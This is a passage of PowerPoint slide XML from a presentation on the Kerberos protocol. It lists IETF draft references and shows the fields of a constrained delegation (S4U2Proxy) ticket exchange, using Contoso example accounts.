                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>http://www.ietf.org/internet-drafts/draft-ietf-cat-kerberos-extra-tgt-02.txt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Extending Change Password for Setting Kerberos Passwords</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>http://www.ietf.org/internet-drafts/draft-trostle-win2k-cat-kerberos-set-passwd-00.txt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kerberos Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372046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itchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Constrained Delegation (S4U2Proxy)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="テキスト ボックス 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750762" y="2226242"/>
            <a:ext cx="3516438" cy="767898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="982663" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>KdcOptions: CNAME-IN-ADDL-TKT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="808038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Realm:	CONTOSO.COM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="808038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0" err="1">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:	MSSQLSvc/mssql.contoso.com:1433</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="982663" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="コンテンツ プレースホルダー 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415482" y="1304273"/>
            <a:ext cx="6658825" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="14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rgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="14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rgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="14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rgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="14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rgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="14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ja-JP" sz="1800"/>
              <a:t>S4U2proxy TGS Exchange</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="テキスト ボックス 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5088015" y="2226241"/>
            <a:ext cx="2594082" cy="535852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="982663" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Crealm:	CONTOSO.COM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="982663" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cname:	sqluser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="テキスト ボックス 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5088015" y="1806850"/>
            <a:ext cx="3516438" cy="2495618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> KRB_TGS_REP</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1"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17" name="テキスト ボックス 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750762" y="1806848"/>
            <a:ext cx="3516438" cy="3740512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> KRB_TGS_REQ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1"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19" name="テキスト ボックス 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051416" y="3391885"/>
            <a:ext cx="2693478" cy="570515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="982663" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cname:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0" err="1">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>httpagent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="982663" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Realm:	CONTOSO.COM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="982663" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sname:	krbtgt/CONTOSO.COM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="テキスト ボックス 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051416" y="3113828"/>
            <a:ext cx="2693478" cy="856192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Server’s TGT</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1"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21" name="テキスト ボックス 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750762" y="4133493"/>
            <a:ext cx="3516438" cy="337951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="982663" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Additional Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="テキスト ボックス 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051416" y="4664347"/>
            <a:ext cx="2693478" cy="608693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="808038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cname:	sqluser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="808038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Realm:	CONTOSO.COM</a:t>
            </a:r>
          </a:p>
          <a:p>
